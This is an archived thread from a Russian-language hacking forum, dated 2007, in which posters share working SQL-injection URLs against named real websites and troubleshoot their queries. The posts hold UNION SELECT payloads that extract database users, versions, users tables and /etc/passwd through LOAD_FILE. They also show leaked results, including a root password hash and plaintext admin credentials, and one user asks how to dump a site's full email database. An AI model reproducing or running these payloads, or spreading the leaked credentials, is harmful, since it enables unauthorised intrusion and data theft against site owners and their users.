ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.06.2007, 12:32
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
Сообщение от kamaz
2V.I.P
Колонка "password" не работает потому, что в таблице user ее нет. Есть только в таблице user с перфиксом mysql.И еще в таблице users c различными перфиксами
не ожидал такое от тебя, репы вроде не мало 
|
|
|
03.06.2007, 14:01
|
|
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698
Репутация:
20
|
|
Код:
http://www.exploro.ro/index.php?module=detalii_excursie&id_get=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
USER: exploro_exploro@localhost
DATABASE: exploro_exploro
VERSION: 4.1.21-standard |
|
|
|
03.06.2007, 17:19
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
2 }{0TT@БЬ)Ч
ыыы
Только щас заметил...
Раз я тут все равно показываю себя нубом... то может кто-нить обьяснит, почему не получается запрос
Код:
http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6, concat(user,char(58),password)+from+mysql-old.user--
Хотя
Код:
http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat(table_schema,char(46),table_name)+from+information_schema.columns+where+table_name=CHAR(117,115,101,114)--
|
|
|
|
04.06.2007, 05:25
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
Код:
http://www.id-t.nl/news-subpage.php?newsid=-5449+union+select+1,2,3,4,5,6,7,user,password,user(),11,12,13,14,15,16,17,18+from+mysql.user/*
root:69540c43630a0fad
idt@192.168.2.1
Код:
http://www.montevideo.nl/en/nieuws/detail.php?id=-108'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database(),0x3a)/*&archief=
Сообщение от GooD and EviL
Код HTML:
http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=-1+union+select+1,VERSION(),3,USER(),5/*
- имееться юзеры+пассы
Код:
http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=-1+union+select+1,password,3,username,5+from+users/*
+limit в помощь...
Последний раз редактировалось KPOT_f!nd; 04.06.2007 в 05:31..
|
|
|
|
04.06.2007, 14:40
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
http://www.proplay.ru/users/login/
Уязвимо поле "пароль" (при ' выдает ошибку мускула). Но пара admin : 1 or 1=1/* не проканала  |
|
|
|
04.06.2007, 15:47
|
|
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698
Репутация:
20
|
|
Магазин велосипедов
Код:
http://www.velo-mag.ru/index.php?action=page&id=-12345+union+select+1,2,3,4,5,6,7,8/*
USER: assortif_velo@localhost
DATABASE: assortif_velo
VERSION: 5.0.24a
18 таблиц: stella_pages, stella_news, fb_pages, VIEWS, USER_PRIVILEGES, TRIGGERS, TABLE_PRIVILEGES, TABLE_CONSTRAINTS, TABLES,
STATISTICS, SCHEMA_PRIVILEGES, SCHEMATA, ROUTINES, KEY_COLUMN_USAGE, COLUMN_PRIVILEGES, COLUMNS, COLLATION_CHARACTER_SET_APPLICABILITY, COLLATIONS, CHARACTER_SETS.
Код:
http://www.ik-ki.nl/?id=14&subid=30&action=bekijk&nieuws=-12345+union+select+1,2,3,4/*
USER: ikki_ikki@localhost
DATABASE: ikki_db
VERSION: 4.1.22
Код:
http://www.icppc.pl/pl/index.php?id=-12345+union+select+1,2,3/*
После запроса появляются еще ошибки, поэтому чуть не упустил из виду, что отображается 3 поле.
USER: icppc_jakub@localhost
DATABASE: icppc_jakub
VERSION: 4.1.21-standard-log
|
|
|
|
04.06.2007, 17:15
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515
Репутация:
29
|
|
www.e1.ru:
/etc/passwd/
http://www.e1.ru/business/conference/yarmarka/read.php?theme=-1&question=-1'+union+select+1,2,3,4,LOAD_FILE(CHAR(47,101,116, 99,47,112,97,115,115,119,100))/*
www.sermet.ru:
http://www.sermet.ru/index.php?idpage=2&idnews=-1+union+select+1,2,3,4,5+from+users/*
admin:admin
pass:140108
|
|
|
|
04.06.2007, 18:36
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515
Репутация:
29
|
|
www.uph.ru:
http://www.uph.ru/inner.php?page=reklama1&top=-1+union+select+1,2/*
www.rns-soft.ru:
http://www.rns-soft.ru/?action=projects&id=-1+union+select+1,2,3,4+from+news/*
|
|
|
|
04.06.2007, 21:09
|
|
Banned
Регистрация: 02.06.2007
Сообщений: 42
Провел на форуме:
263861
Репутация:
6
|
|
привет., у меня такая проблема, я пока в скьюэл не очень, поэтому не могу понять как получить доступ к базе мыл сайта:
ну есть сайт допустим сайт www.xxxxx.com с бажным скриптом, в строке URL ввожу :. www.xxxxx.com/index.php?l=2&id=-1+union+select+1,aes_decrypt(aes_encrypt(email,0x7 1),0x71)+from+users+limit+40000,1/*&s=3 вот ето, но он выдает ток по 1 мылу, в зависимости от того что ввел перед
,1/*&s=3. Например ввожу перед ,1/*&s=3 число 10000 выдает одно мыло , ввожу перед ,1/*&s=3 число 40000 выдает другое, и тд, но по 1, а как сделать чтоб всю базу просмотреть? или выкачать, может что то добавить к етому коду?
|
|
|
|
05.06.2007, 07:47
|
|
Новичок
Регистрация: 01.06.2007
Сообщений: 7
Провел на форуме:
82944
Репутация:
0
|
|
Сообщение от l1ght
интересная скуля*
в качастве пароля подойдет:
Код:
' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
Что-то не получается.(( Может что не то делаю? 
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
